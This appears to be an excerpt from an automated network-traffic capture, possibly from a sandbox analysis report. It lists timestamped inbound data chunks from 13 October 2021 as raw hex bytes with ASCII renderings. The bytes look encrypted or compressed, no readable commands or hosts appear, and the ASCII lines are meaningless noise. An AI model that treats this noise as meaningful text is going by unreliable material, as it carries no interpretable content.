                                                          2021-10-13 15:10:52 UTC163INData Raw: a9 e0 c4 60 fb 7f 54 62 f6 7f 11 05 9a a1 57 6b c0 7b b5 69 4e 9e 22 30 78 ea ff 26 31 fe 9a 78 51 5f 73 98 7e b6 5e 3f e5 b3 de 89 74 10 78 b8 cd 7a 9c a7 23 14 f9 e1 69 e6 a8 53 a5 5e 6a 4d 5c e0 1e 97 0d 24 0b 0f 8f 51 43 d9 b1 a0 4f 94 ac fe 00 11 ed 0b b8 ca 1e 85 44 74 5d 4d c4 39 ee 86 2f 7a 1d 46 d5 46 54 f3 7f c8 28 a0 b2 c0 81 65 da 32 a3 c3 a5 d9 e2 62 92 9b 2a 7c 4b d8 c1 e9 96 b0 45 83 9b d3 08 09 f6 eb f9 7d 86 36 29 55 8a 83 fd a7 fc 36 c6 6a 67 2b d5 a4 4c b0 c7 64 5b d6 4d 39 44 f3 7b 9b 53 23 bd 91 b7 4e 8e 45 cb 52 54 8f 09 de c2 10 7c ab d1 82 a1 d5 61 c1 7f 84 a7 86 37 a9 8a 35 32 83 38 7b 5b ca 95 77 12 8c 1d 6f 71 aa df c1 31 5f 6d 40 f9 61 8c a4 41 2e 8e 24 6d 76 e2 0e a3 05 32 d9 ea 7e a3 ca b1 69 69 82 ba 07 25 95 08 64 a7 ef 2b
                                                          Data Ascii: `TbWk{iN"0x&1xQ_s~^?txz#iS^jM\$QCODt]M9/zFFT(e2b*|KE}6)U6jg+Ld[M9D{S#NERT|a7528{[woq1_m@aA.$mv2~ii%d+
                                                          2021-10-13 15:10:52 UTC164INData Raw: 45 be 38 fc a5 32 97 fc d1 53 25 59 10 bb 6d d2 ca e9 85 9b 05 8b 27 20 da c7 95 5d c9 14 3f 58 d2 01 39 6b 01 5d 6a 3e 3b 3c 2b 98 a1 e4 31 36 3c 81 16 5a 49 24 41 67 90 3b 7f 40 f7 36 7d 77 9a 3d e9 5d 4e d3 44 75 88 0e c2 cf ac b6 d9 87 b7 f5 a9 b9 2e e5 af 9d a4 dc af 95 cc 85 67 51 bd 23 5f aa 2f 20 2a 45 94 91 85 f0 6b 1c c9 6e 19 1a dc 25 67 40 cb aa 47 1c 82 14 79 80 1f ba 44 ff bf 5f ec 6e 03 b9 27 9f a4 79 2a ed 7b 31 fc 60 00 ca fd b6 81 63 5e 2a cc 61 22 88 64 84 44 fe 5d d3 b9 82 e5 e5 1a 18 5b 33 3c 15 e1 cd 60 d5 7e 70 73 af 7e 3d a6 7b 60 66 db ee 51 dd 5e d3 0d 26 59 50 f9 d8 7d 86 35 be 71 ba ce 30 83 ab 40 53 3f 46 b5 4b b9 bb 73 91 bb 46 55 5a d8 e3 d4 21 42 bc 16 50 0c 05 64 ad 2b a9 15 52 d2 fa bb 3f f8 fb b5 4e 0d f8 cd 0d f6 29 b3
                                                          Data Ascii: E82S%Ym' ]?X9k]j>;<+16<ZI$Ag;@6}w=]NDu.gQ#_/ *Ekn%g@GyD_n'y*{1`c^*a"dD][3<`~ps~={`fQ^&YP}5q0@S?FKsFUZ!BPd+R?N)
                                                          2021-10-13 15:10:52 UTC166INData Raw: 76 e8 2a 47 c2 2b 81 ec 4a 3a 2a c4 c1 7c b2 67 ad 4b d0 4c 60 32 df df 2b f3 88 07 7c 42 b8 ed 77 b6 fe 04 b2 d6 3c 91 fd b6 eb d4 62 ff 45 61 6b e5 c9 0a 3f 8a 8d 47 fc cb 41 14 69 e6 eb 29 0a d2 f0 54 d9 2a c4 7b 62 f9 98 50 3f a6 9a 4e fb e5 89 04 a5 64 30 59 e2 07 53 8c 5c 22 b3 66 c8 79 ef 81 de 3a 59 7a d8 54 6d ea 90 1d 92 3e a0 43 4a 53 28 ae ad 30 ab a1 32 25 1c 44 11 b5 61 35 a9 2c 52 4e 32 f6 34 7a 81 22 6b 34 4b d8 5e 59 f2 61 6f ae a9 a1 65 9e c2 66 15 e8 94 ab 7e e0 6c 82 11 36 89 27 c4 e8 db 80 43 de 06 8a 6d 43 89 61 ec aa a9 c4 f8 14 54 d9 72 8a 1d 0b 21 95 1d 00 4b be a5 1f 3e d1 c5 d2 c6 5e 84 3a 93 c4 8c 04 0f e0 f1 92 4f d9 dc dd f3 dd 8f 1a c0 ba 37 f1 ac 8a cb e0 f2 76 c0 24 1c fd 59 ee ae d1 2e 76 a4 61 6f 02 2f de f7 e4 3a 44 6e
                                                          Data Ascii: v*G+J:*|gKL`2+|Bw<bEak?GAi)T*{bP?Nd0YS\"fy:YzTm>CJS(02%Da5,RN24z"k4K^Yaoef~l6'CmCaTr!K>^:O7v$Y.vao/:Dn
                                                          2021-10-13 15:10:52 UTC167INData Raw: 00 d7 50 24 89 c4 da 92 fd ae 7d 2a 93 de 56 7a 43 83 08 43 03 04 8f 2b 4e c6 85 e1 12 03 49 79 43 89 3f fc 10 20 94 d2 66 6d 13 6f 7e a9 35 bf cd 84 d3 e1 51 3a 22 3b d3 88 ec ad b7 53 d8 c7 21 f2 f6 c3 1b 0d 92 16 7f 85 81 51 fe 28 71 3c c7 cb f8 03 3a f6 6f af 34 14 a0 47 da 6d 49 6b 84 c6 35 b7 49 de 1a 2b 33 f7 29 c1 08 1a 82 b7 f9 a1 20 94 4f 7c f2 f2 ab e1 68 b4 6d 06 47 a8 99 37 da bc 00 9b 05 f0 c1 f8 d8 09 ba 23 25 6c 6d c2 1c 46 f1 2d 2d 9f 39 5a 8e 9b 0b 31 c0 3d bb 16 30 d4 89 bd 50 59 01 13 dd d7 5d aa 39 56 39 d5 96 e2 82 2c 73 ed 32 5f 7d 06 f0 7d b7 b3 7c 58 fd c1 f9 11 88 62 84 80 5a 6c d1 bf 9f a6 3d 28 a8 5c 36 ca 14 d3 75 71 d5 e9 6c e2 53 78 89 30 7f 59 64 dd 01 5f da 67 cc 0b c8 9d ee ca d8 7a 86 a2 04 cb a7 c8 39 16 44 72 ea 38 44
                                                          Data Ascii: P$}*VzCC+NIyC? fmo~5Q:";S!Q(q<:o4GmIk5I+3) O|hmG7#%lmF--9Z1=0PY]9V9,s2_}}|XbZl=(\6uqlSx0Yd_gz9Dr8D
                                                          2021-10-13 15:10:52 UTC168INData Raw: 7a e3 c8 cf 0e 33 64 16 45 07 f7 88 17 22 2f e1 55 c4 76 56 0e f1 09 ad 55 ad 58 7f 97 52 18 dc f7 2c 5b 52 15 b9 bf 9b bc 66 43 37 46 c2 65 28 e1 59 1b bd 56 18 86 a3 66 ad 73 fb be fd 33 ce 9e 97 00 6c 0e 70 bc b2 e0 75 b7 7e 53 af 55 b6 91 02 92 ea c4 60 fe 45 67 e4 f6 dd 2b a8 a8 a2 5e f2 ca 41 86 6f 4e 76 28 1c 6b 7b fe d0 22 ca a9 7e 51 85 51 bf 64 a6 7e 6e e5 97 e4 9f 74 32 58 e2 c9 fc 9c 48 03 24 e2 ce 60 fd 80 de a2 54 6a 5a 55 7b 39 0a 0c ba 36 b0 a9 6b 1c 2a af ad 64 97 ac 3d 23 dd ce 08 b8 73 54 a9 69 66 5d 21 f7 e4 d0 72 2d 78 35 f7 9e 40 54 f0 60 7e 32 bb b1 81 9d d3 c0 58 c2 96 aa 7e f8 61 92 c0 21 0f 43 db c1 c9 e5 45 4d 00 99 7e 15 58 f5 6e f0 a6 92 ec 7a 53 8a 6c dc 8c cf 30 d1 80 5f da fd ea 28 20 d7 c3 41 d1 4d 11 6d b3 5a 9c 53 e5 dd
                                                          Data Ascii: z3dE"/UvVUXR,[RfC7Fe(YVfs3lpu~SU`Eg+^AoNv(k{"~QQd~nt2XH$`TjZU{96k*d=#sTif]!r-x5@T`~2X~a!CEM~XnzSl0_( AMmZS
                                                          2021-10-13 15:10:52 UTC169INData Raw: 22 71 6b cc f7 0e 17 82 da df 3d 68 c8 7a a7 18 2e 1d 41 54 12 61 68 63 a7 eb 72 8c 33 d0 a6 f3 92 a2 bf 06 e0 ae dd 0b 72 49 49 50 b3 a8 1c e5 9c f0 a4 08 6e b4 d8 32 a1 44 90 0a 42 02 93 19 60 eb d8 a0 76 23 d2 4b 7f 45 1a 3f ef 85 77 07 45 42 45 8b a3 fe a4 32 97 a5 d0 45 31 43 12 2b 6d 53 cb eb 85 98 05 5e 29 14 ff 2b 97 be c9 95 3e 53 d3 02 39 ba 03 00 61 86 36 d4 2b 16 a0 ef 30 35 3c ca 12 09 42 79 4c 8d 90 b5 7e 4b f6 35 7d f5 98 5f e2 ea 43 27 44 fb 89 0c c2 cc ac e1 c2 b3 92 19 ab 4b 2e 6b ae 9f a4 df af 44 ce d8 6c 01 b1 d1 5f 3a 2e 22 2a 42 94 da 81 a3 60 25 c6 9c 19 89 dd 27 67 43 cb fc 53 7e 89 c7 76 72 1f 2d 45 5d bf 5c ec 13 18 8d 02 6e a6 8b 2a 73 7a 33 fc 63 00 b6 e9 eb 8a ab 51 d8 cc fe 23 8a 64 87 44 1d 5d 80 b2 7d ea 1f 1a aa 5a 36 3c
                                                          Data Ascii: "qk=hz.ATahcr3rIIPn2DB`v#KE?wEBE2E1C+mS^)+>S9a6+05<ByL~K5}_C'DK.kDl_:."*B`%'gCS~vr-E]\n*sz3cQ#dD]}Z6<
                                                          2021-10-13 15:10:52 UTC171INData Raw: 2f 44 fb 0c ba aa 07 37 7c 15 4d 2c 6b 32 9d 95 11 26 09 8c 57 5b 83 61 98 48 ea f8 fb da 53 42 39 b8 12 2c 16 31 bc fc 99 7b 67 95 cf 1d 33 69 00 92 94 dc 08 69 28 2e e1 55 c4 65 d6 ca e1 fe 5a 7d 4a 4c 74 96 52 18 dc e4 ac 93 46 36 3c 94 70 a4 61 42 37 46 c2 76 a8 c0 79 38 38 7d ec 8a bc 67 ad 73 fb ad 7d a4 de 6a 08 2b 95 52 69 bd b2 e0 75 a4 fe c4 bf c8 25 ba fd 06 f3 c5 60 fe 45 74 64 b5 cc 58 25 83 a7 83 eb cb 41 86 6f 5d f6 2b 0c 48 fe d5 c4 9f d3 a8 7e 51 85 42 3f fb b2 85 fb ce 89 2d 97 75 32 58 e2 da 7c df 59 89 a9 c9 eb 51 f7 81 de a2 54 79 da 71 79 c2 9f 27 90 87 ba a8 43 43 2a bc ad ad 84 4c 2a 0e 1c 3e 03 b9 63 34 a9 7a 66 da 01 f4 26 ef 94 2f 74 34 4b fe 40 47 f0 0c 7b e9 a4 98 67 5f df c1 34 a3 96 b9 7e 6f 71 18 1b 1d 89 3f d4 c0 c5 86 45
                                                          Data Ascii: /D7|M,k2&W[aHSB9,1{g3ii(.UeZ}JLtRF6<paB7Fvy88}gs}j+Riu%`EtdX%Ao]+H~QB?-u2X|YQTyqy'CC*L*>c4zf&/t4K@G{g_4~oq?E
                                                          2021-10-13 15:10:52 UTC172INData Raw: 02 86 6f 63 63 39 e2 60 e0 99 d0 ac 03 48 e5 33 31 db f6 b0 de d8 2d 47 e7 c2 08 14 00 50 21 ac 98 52 a9 05 b5 24 75 bf ea ba 71 6d e4 07 15 df 15 97 b3 06 09 c9 67 3f 18 28 35 9b 4b 53 6d 22 0f c0 8a 73 b8 ab d0 a0 db 75 bd 77 91 ac dc a6 6a 73 02 d1 50 b5 80 23 de d2 f9 ed 7a c9 d5 d9 56 39 44 96 02 13 2e 6d 8f 2f 64 63 c1 77 13 48 4b 79 4d 69 31 a9 16 39 14 ad 23 44 3f 39 fe a2 3a e8 e9 2c 52 6a 50 e6 4a 6c 53 cb eb 83 93 30 6c 1f 21 8a da bd de c8 95 3e 53 d5 09 7b c8 98 5e 3a 47 0d b4 2a 16 a0 ef 36 3e 92 99 57 5e 18 5d 2b ed 91 b5 7e 4b f0 3e c1 a6 65 3c b8 24 38 47 45 fb 89 0c c4 c7 a5 f9 9c 83 e5 e8 01 2b 2f 6b ae 9f a2 d4 8c 1c 33 84 35 c0 0a b1 5e 3a 2e 22 2c 49 1e 93 ac f1 38 01 21 fc 18 89 dd 27 61 48 52 b5 c8 1f d1 09 8d 12 1e 2d 45 5d b9 57
                                                          Data Ascii: occ9`H31-GP!R$uqmg?(5KSm"suwjsP#zV9D.m/dcwHKyMi19#D?9:,RjPJlS0l!>S{^:G*6>W^]+~K>e<$8GE+/k35^:.",I8!'aHR-E]W
                                                          2021-10-13 15:10:52 UTC173INData Raw: 24 35 ca f5 3d 1c 2c 08 17 ce c7 90 ea 1c bc 22 64 06 4a ad c6 c4 48 00 67 1f 34 58 d7 a5 60 88 6a 4b 99 37 2c b0 c8 33 e3 29 5c cf 3a 8c 7e 46 34 e2 b8 4c c4 6a 33 9b 8d 25 10 35 c7 24 80 61 cc 99 1c ef f9 fa c2 67 74 5a 69 6a 06 a5 93 bd d0 9f 7a 66 95 58 0f 20 64 76 45 34 7c 09 15 2e 2f e0 55 c9 71 c5 0e 91 29 e6 dc 4b 50 73 97 43 18 4b f6 25 78 32 35 22 32 71 b4 6a 43 21 46 55 64 01 c2 39 3b 9e 75 ec 8e af 66 ab 6b cf 9b 6e 33 ae be f4 8d 94 06 7c bc d4 e3 e2 b6 6d 72 cf 75 6d 1d fc 9a e6 c4 66 e6 71 42 77 f6 ba 0b b8 24 a6 57 fe ca 27 85 08 5e e5 28 7b 4b 7a 72 c5 2b c4 a9 3a 52 12 50 c1 65 c1 5e 5d 69 88 ed 8f 74 23 40 d8 ec fa 9c 2f 23 ab 6d ea 69 ed 80 c8 a2 c3 6b e4 71 1c 19 f1 83 91 3f a0 a9 55 43 bd ae e9 40 f7 ac 28 ab 1d c6 19 b8 75 34 3e 68
                                                          Data Ascii: $5=,"dJHg4X`jK7,3)\:~F4Lj3%5$agtZijzfX dvE4|./Uq)KPsCK%x25"2qjC!FUd9;ufkn3|mrumfqBw$W'^({Kzr+:RPe^]it#@/#mikq?UC@(u4>h
                                                          2021-10-13 15:10:52 UTC175INData Raw: 62 88 c0 47 89 4b d0 92 c6 48 3f 7b ad 80 79 89 b9 b4 55 a5 61 96 60 5d 8f 1b 20 0d 32 63 d1 4d 1d bb f9 da 20 3a 15 17 62 95 81 4d ed 13 70 fb f4 e1 71 93 ad 15 48 72 34 ee 4a 86 70 3a 4c 2c b3 a4 c3 1e 14 97 57 51 44 e8 1b e8 a9 b4 0c 31 be fc ba 7c 6c e2 fb 65 1f 91 3b b2 32 4d c8 71 3f 15 29 45 4a 3f 1a a0 8f 0e a8 ce 72 a9 ab 47 a7 6d b8 c9 b7 21 00 dd d2 2e 72 13 d1 c7 b2 56 36 8e 94 a5 41 7b 61 91 d8 40 39 49 97 20 49 7e 93 6a 8a 65 d7 85 76 05 48 8f 7e db 0a 44 ef b6 9a 15 45 67 45 29 39 69 a5 a3 bc 9c d2 7b d4 51 12 0e 6d 45 cb e6 82 0a 2e 25 31 94 f8 da 95 9b c9 93 26 67 f6 12 39 81 00 f9 99 46 39 f1 2b 00 a0 78 31 dd 17 f1 11 72 bc 5c 43 a8 90 a3 7e dc f7 35 51 ce 9b b5 1f 25 4c 02 44 ed 89 01 c5 d2 80 9a da 5b 40 e9 a9 6e 2e 6d b6 ab 81 ea 8c
                                                          Data Ascii: bGKH?{yUa`] 2cM :bMpqHr4Jp:L,WQD1|le;2Mq?)EJ?rGm!.rV6A{a@9I I~jevH~DEgE)9i{QmE.%1&g9F9+x1r\C~5Q%LD[@n.m
                                                          2021-10-13 15:10:52 UTC176INData Raw: f4 77 99 b4 a4 61 6c ca 07 63 15 e1 33 d5 7a c2 8f 07 67 95 1f 5f d8 02 90 a9 ef 46 85 72 6a 56 5e e8 3a 3c 79 52 7a 9e 20 c2 a0 b6 07 0d 6f 2e ec 91 cf 51 90 b3 19 5a b7 18 22 44 df c4 de cf 01 f1 1f d4 5c 31 aa 1a 9b 22 39 9b 0f ab b1 5e 33 60 3b a2 f9 62 ba 3e 34 36 6e 3f 4d 52 6a 39 9e 73 13 48 09 9b 56 82 81 4b 98 8a ef 1e ee 3c 51 2c 39 d1 18 04 1d 1b bc 46 9f 44 64 73 cd 73 33 d3 04 47 90 f6 08 83 2e c5 f7 b3 c6 0b d6 dd e3 2b 5e 57 4a c6 73 ff 51 fe de 8a ac b5 40 37 2e be 70 22 6a 64 20 a0 c0 18 a8 e8 4c 39 2a 57 ec 18 af f4 ae 95 f9 c3 7d 16 db bc 00 01 95 90 7c ed a5 06 77 ca fe 13 ba 77 21 90 fd 0c e6 18 63 18 47 1a 64 aa cf 09 3f a9 a7 c1 fe 52 59 60 6d 33 f6 50 0e 49 ec ff c4 bd c4 af 7a b7 87 2c 3f f7 b4 5c f9 e4 89 7b 8f 10 28 be e0 b4 7c
                                                          Data Ascii: walc3zg_FrjV^:<yRz o.QZ"D\1"9^3`;b>46n?MRj9sHVK<Q,9FDdss3G.+^WJsQ@7.p"jd L9*W}|ww!cGd?RY`m3PIz,?\{(|
                                                          2021-10-13 15:10:52 UTC177INData Raw: df 8f 3c b0 78 4e d0 e5 8c 07 6e c6 a5 4b 6d a7 f2 02 8a 17 32 69 cb 29 8c 3e b3 00 79 12 9e 0f 25 bc 26 7f a0 3e 1f d3 2f 18 5a 04 37 8b 1e 0e 93 50 48 61 6b 53 b8 21 0f 5b c4 57 11 43 96 f6 5d 3c 1b de 3b 6a 70 d5 3e 1f df 27 db b6 3a a4 00 84 00 fd 67 c0 60 72 e3 2b e0 e7 93 8a 04 ae e7 48 39 09 f5 72 de 93 2d 25 a4 20 09 f2 02 2b 29 26 9b 19 a8 49 b5 9a 31 e3 ed 5c 73 16 ec 7c 16 1d 15 db b3 a4 4d 9d 65 d9 1a 53 3d ec 4c 18 6c 6f 0f 3e ce 6d b0 4d d2 db d3 5c ba b5 91 e1 dc 44 2e fe 00 37 52 ce 88 f3 fd 96 fd a3 7a f7 91 d4 5c df 46 ed 0a 53 0c 91 8e 61 64 41 85 cf 11 ae 49 02 45 29 36 ed 12 76 14 d3 67 19 2b df fc d9 32 c2 ee d0 53 25 50 84 0e 8e 51 2d e9 f8 9b 72 57 33 20 da da 03 9b 4f 81 d8 51 ae 01 a0 f3 02 5d 6a 47 af f1 26 15 46 ed 4d 36 86 83
                                                          Data Ascii: <xNnKm2i)>y%&>/Z7PHakS![WC]<;jp>':g`r+H9r-% +)&I1\s|MeS=Llo>mM\D.7Rz\FSadAIE)6vg+2S%PQ-rW3 OQ]jG&FM6
                                                          2021-10-13 15:10:52 UTC178INData Raw: 90 b5 92 4f 41 3e 2a e0 b9 66 86 ac 30 b2 1c b7 1f 5e 61 49 a9 18 72 5f 30 f7 34 53 94 dc 5d d3 49 83 40 c7 e4 62 6f 32 a6 24 67 d6 c3 26 36 de 96 1f 6a fa 70 92 13 a1 89 dd cc 27 c7 fb 45 9a 14 9b 6f 15 09 60 ed 65 b6 74 7a 64 53 73 78 de 9d cf 20 50 03 44 cc 1b a0 31 20 cc d6 43 c0 4d 86 fa 13 9d 8c b5 13 cb 71 a2 5d 8c c2 db f5 d8 89 41 c5 0a b5 1b ad 8e c0 b4 72 7b c7 e9 02 50 d8 cc ad f7 30 a1 31 20 68 59 31 1e 77 db 3c f9 72 29 aa 7c c6 33 b2 78 4e 46 73 fb 3a ba 22 da 36 a8 cf fd 00 8a 17 a4 ff 3c 79 6c da cc 7d 9e 99 91 0d 25 bc b0 e9 04 e7 cd 37 50 65 53 d2 38 89 1e 0e 05 c6 61 2b 8c b7 c7 5c 24 af cb 55 11 43 00 60 93 8d fb 3a 44 17 3d c7 32 1d df 27 4d 20 4b 01 e7 60 7f 80 08 f0 6c 70 e3 2b 76 71 6b af e5 4a 98 35 a8 58 f9 70 de 93 bb b3 71 d6
                                                          Data Ascii: OA>*f0^aIr_04S]I@bo2$g&6jp'Eo`etzdSsx PD1 CMq]Ar{P01 hY1w<r)|3xNFs:"6<yl}%7PeS8a+\$UC`:D=2'M K`lp+vqkJ5Xpq
                                                          2021-10-13 15:10:52 UTC179INData Raw: 07 a2 f9 f4 0c 46 ef ae e7 da 87 21 e8 b8 43 c8 69 d3 9f 02 fc ad 02 cd 85 f1 c0 d3 f1 b9 38 53 22 e2 61 96 9c 82 f0 fd 01 23 89 ff 8b a0 27 8d 60 c9 ba 50 1c 14 09 c2 52 f9 2f 38 5d b4 7e ee 15 00 b9 b1 9f b0 9f cc 71 07 33 d1 41 02 f0 ea b6 17 7e bb f8 2a fc 5e 8a 2b a5 46 5b 5e d3 2f 9f db 0b fc a8 27 36 4d 34 e3 77 77 d5 e8 6d 53 4a 98 8b da 7e f3 47 d9 01 52 dd c8 ce 1e fa bf eb 85 da c8 a7 37 05 68 ba 58 39 cb 43 a6 ea 43 44 62 6a bb a2 77 91 2d 4f c1 9a 3e 5a a8 23 bb 9d 14 a6 16 05 f2 a4 5d 59 f3 eb ae f8 a0 1d fa b8 b1 4e 9b f1 39 c3 10 90 cf cb 09 d4 08 99 74 a6 f5 6c 86 06 13 17 15 31 6f 5a bd 8f dc 65 01 1f fe de 72 92 dd e5 de a5 0d 6a a0 5c 7c 3a a3 78 22 78 55 22 84 80 c9 07 1f 6c ba ec 84 c8 21 92 97 0d 7e 97 67 22 69 dc 50 de 1e 00 81 1d
                                                          Data Ascii: F!Ci8S"a#'`PR/8]~q3A~*^+F[^/'6M4wwmSJ~GR7hX9CCDbjw-O>Z#]YN9tl1oZerj\|:x"xU"l!~g"iP
                                                          2021-10-13 15:10:52 UTC180INData Raw: 29 b9 a9 bb 7d 87 51 3f 64 26 5e 94 e0 6f ef f2 74 d5 74 e0 c9 7c 9c c8 23 49 fc 0d 6b 90 80 d7 8f 56 6a da 55 fb 19 0a 09 76 3d dd a9 68 6e 28 af ad 64 10 ac 27 05 fa c4 64 b8 2f 19 ab 69 66 5d a6 f7 f5 c1 72 2d 14 35 26 d3 42 54 f0 60 f9 32 ec 93 81 9d bf c0 bb 8e 94 aa 7e f8 e6 92 f8 33 6f 41 b7 c1 74 ab 47 4d 00 99 f9 15 bd d7 0b fb ca 92 ab 34 51 8a 6c dc 0b cf 3c c3 e5 54 b6 fd 57 61 22 d7 c3 41 56 4d 4b 49 f5 51 f0 53 06 98 73 9f 48 8e 54 db b3 4b 6f 0b bf ec 8e 48 af d1 d5 b6 e4 7b d3 52 e4 a9 a4 2a f4 a4 32 20 24 22 fe 59 41 8d 91 10 46 1f 0c 7a a8 df d3 31 24 78 a3 e0 95 8e 45 5c bd 89 34 6d da ff 96 8a a9 37 19 c9 0d 8a 66 9f 7f 79 8c 93 9b 25 ab 17 0f a2 98 2b ea 03 67 5a c4 3a 1f 1e e6 96 20 4a 42 6a b4 95 5e 0f b9 c9 c3 11 02 a7 86 5f f2 1d
                                                          Data Ascii: )}Q?d&^ott|#IkVjUv=hn(d'd/if]r-5&BT`2~3oAtGM4Ql<TWa"AVMKIQSsHTKoH{R*2 $"YAFz1$xE\4m7fy%+gZ: JBj^_
                                                          2021-10-13 15:10:52 UTC182INData Raw: c9 65 06 51 d3 01 39 6a 00 ab 7c a1 3b 8c 2b 04 99 ed 30 36 3c 1a 11 2e 4a bb 41 d5 90 81 47 49 f6 36 7d 25 9b 0e fe c2 4e 7f 44 ad b0 0e c2 cf ac 71 da 19 b4 0e ab 13 2e 1c 97 9d a4 dc af 94 cd 24 70 26 bc 89 5f a2 17 20 2a 41 94 0a 82 18 68 e7 cb c4 19 33 e4 25 67 40 cb 2c 50 0b 9b ef 7b 2a 1f f1 7c 5f bf 5f ec 83 00 ab 23 79 a6 d3 2a 8e 43 31 fc 60 00 66 ea 1d 9b 98 5c 80 cc e1 19 88 64 84 44 cd 5e ef bd 79 e7 47 1a eb 60 34 3c 15 e1 e1 77 b8 65 8b 71 31 7e ea 9d 7c 60 66 db 97 52 ad 5a 28 0f b5 59 6c c2 d8 7c 86 35 93 68 47 d1 df 83 38 40 4e 04 46 b4 4b b9 34 77 0b bf a9 55 d5 d8 9f ef 21 43 bc 16 30 16 18 45 42 2b 22 15 01 e9 fa ba 3f f8 2e b1 8a 09 17 cd 8a f6 98 89 c9 32 f6 0a 0f 74 eb 42 8a c8 7a f5 3e 53 33 33 78 bf 19 dc 8b 93 f9 5d a5 94 dc 9b
                                                          Data Ascii: eQ9j|;+06<.JAGI6}%NDq.$p&_ *Ah3%g@,P{*|__#y*C1`f\dD^yG`4<weq1~|`fRZ(Yl|5hG8@NFK4wU!C0EB+"?.2tBz>S33x]
                                                          2021-10-13 15:10:52 UTC183INData Raw: 39 be b2 e0 75 21 fe 32 bc 93 23 ed fd dc a3 c6 60 fe 45 f1 64 e2 c2 ed 3d d4 a7 30 bb c8 41 86 6f d8 f6 b0 08 ad ee 82 c4 a3 81 ab 7e 51 85 c7 3f 71 bb b8 fb 99 89 44 ca 76 32 58 e2 5f 7c 59 5c c5 b1 9e eb a2 a8 82 de a2 54 fc da 3d 79 ff 9f 70 90 d3 e5 ab 43 43 2a 39 ad 8b 84 4a 32 59 1c c8 5f ba 63 34 a9 ff 66 c5 24 11 36 b8 94 1f 2f 37 4b fe 40 c2 f0 79 6c d4 a4 cf 67 cd 84 c2 34 a3 96 3c 7e 01 65 74 11 4a 89 30 8c c3 c5 86 45 db 00 d4 6c f3 0b 8b ed 6d f1 90 78 19 53 1c 6c 25 8b 29 22 bb 03 e3 8d ff a2 4c 20 41 c3 36 c3 ab 84 11 13 85 cb 51 11 b6 71 09 48 b8 d5 3d f7 33 89 f1 84 ee b7 66 ad 47 d5 17 71 9d c5 02 02 b1 9e 28 af 8a 30 b6 24 86 7f bf 33 f5 77 2e 7c 1d 70 54 aa 49 d3 da b1 9e 4c ad 73 d2 7f 5e 20 a7 36 fb da e5 19 6c 15 4f ff 4b 37 88 d8
                                                          Data Ascii: 9u!2#`Ed=0Ao~Q?qDv2X_|Y\T=ypCC*9J2Y_c4f$6/7K@ylg4<~etJ0ElmxSl%)"L A6QqH=3fGq(0$3w.|pTILs^ 6lOK7
                                                          2021-10-13 15:10:52 UTC184INData Raw: 13 48 4b e9 45 1c 0b 09 10 0b 14 31 36 47 3f 39 fe 32 32 a9 e7 34 51 58 50 87 5f 6f 53 cb eb 13 9b 4b 6a d7 22 a7 da 23 ca cb 95 3e 53 45 01 51 fa e6 5f 17 47 e1 a0 29 16 a0 ef a6 36 d6 b8 f7 58 34 5d b9 f9 92 b5 7e 4b 60 36 00 b2 7d 3f 94 24 50 50 46 fb 89 0c 54 cf 6e e1 3c 85 ca e8 94 3c 2c 6b ae 9f 32 dc 6f 03 2b 87 1a c0 e1 a6 5d 3a 2e 22 bc 41 a2 9b 64 f2 16 01 48 eb 1b 89 dd 27 f1 40 39 bb b6 1e ff 09 db 05 1d 2d 45 5d 29 5f 80 12 e6 bb 5a 9f 60 fc 28 73 7a 33 6a 60 64 f2 0c b4 fc 7e bb af ce fe 23 8a f2 84 53 52 b8 d1 c4 9f e2 69 18 aa 5a 36 aa 15 7a 75 91 d7 03 6d 5b 1f 7c 89 a7 7e f6 66 9b 0a b4 df 23 ce 44 9b 5b e9 f8 da ea 86 fd 07 8e b8 b3 39 eb 16 42 e8 3e 44 22 4b d2 b6 91 93 c6 4f dc fb da 58 d5 23 d5 bc e4 a4 f0 07 19 a4 84 0c 17 e9 d3 f8
                                                          Data Ascii: HKE16G?9224QXP_oSKj"#>SEQ_G)6X4]~K`6}?$PPFTn<<,k2o+]:."AdH'@9-E])_Z`(sz3j`d~#SRiZ6zum[|~f#D[9B>D"KOX#
                                                          2021-10-13 15:10:52 UTC185INData Raw: 97 c4 18 cc f2 4a 59 3e 35 89 e3 72 b4 6a 43 a1 46 62 40 4e e3 35 3b e3 0a ee 8e af 66 3b 73 c1 bb 9b 31 a2 be eb 5c 97 06 7c bc 24 e0 ae 9c 18 51 c3 75 2c ce ff 9a e6 c4 f6 fe 21 62 82 f4 b6 0b 10 f7 a5 57 fe ca d7 86 8e 7e 10 2a 77 4b bd a1 c6 2b c4 a9 e8 51 21 54 d9 66 cd 5e 8b ba 8b ed 8f 74 a4 58 e9 f8 9a 9e 23 23 27 bd e9 69 ed 80 48 a2 88 6f 3c 57 10 19 2b 53 92 3f a0 a9 d5 43 1f 9e 4b 66 fb ac e8 7a 1e c6 19 b8 f5 34 be 6f 80 5f 4d f7 ce 9b 96 2f 69 35 dd fe 49 66 16 62 12 32 bd ed 65 9f c2 c0 a2 a3 d7 ac 98 fa 0d 92 2f 68 8b 43 ca c1 53 86 14 7f e6 9b 12 15 57 a9 ef f9 b7 92 ee 19 38 8c 8a de e0 cf a0 99 01 56 cb fd 34 4c cd e3 25 43 bd 4d 24 33 11 53 8d 53 87 b6 f1 9e ae 8c bf db 31 11 8b 09 c2 ec 21 66 68 d7 33 b4 0f 7b 21 20 00 ab d9 2a 39 8a
                                                          Data Ascii: JY>5rjCFb@N5;f;s1\|$Qu,!bW~*wK+Q!Tf^tX##'iHo<W+S?CKfz4o_M/i5Ifb2e/hCSW8V4L%CM$3SS1!fh3{! *9
                                                          2021-10-13 15:10:52 UTC187INData Raw: 8c 8b a4 6a 92 ae 96 35 e3 3d d2 b4 6b d2 d3 a1 b3 ec 2f 25 96 0c a3 28 7d d8 d9 af 39 2d 9b d1 40 aa 93 50 4a 84 d5 84 77 29 45 ad 7d 44 1b 6d e2 f4 74 bd 45 b9 6e d5 3b 3f a4 06 b2 f2 d2 5a 24 64 37 ff 6f 92 cb 4b 8d 6c 07 99 31 47 d2 24 94 5a c9 1b 26 ad d1 c0 39 c8 2f 4e 6a 56 38 94 3e 15 a3 f6 31 9f 17 86 12 43 48 b4 70 a7 93 9c 7f e2 dd 3c 7e 82 9a 07 ff ff 4e cb 44 86 ae 1a c1 06 ac 97 d6 9b b4 d1 a8 c5 22 22 af 56 a4 a7 b6 11 cd c4 66 7e 9a d6 5c 7b 2f 8e 0e c7 94 b5 83 4f 7b 29 ca 90 18 14 ee 0a 64 69 ca 10 77 28 81 58 78 dc 3c 11 46 84 bf ed de 55 03 60 27 c8 b7 e9 29 aa 7a 52 ec 73 00 91 eb bb 9a 74 5d 9c 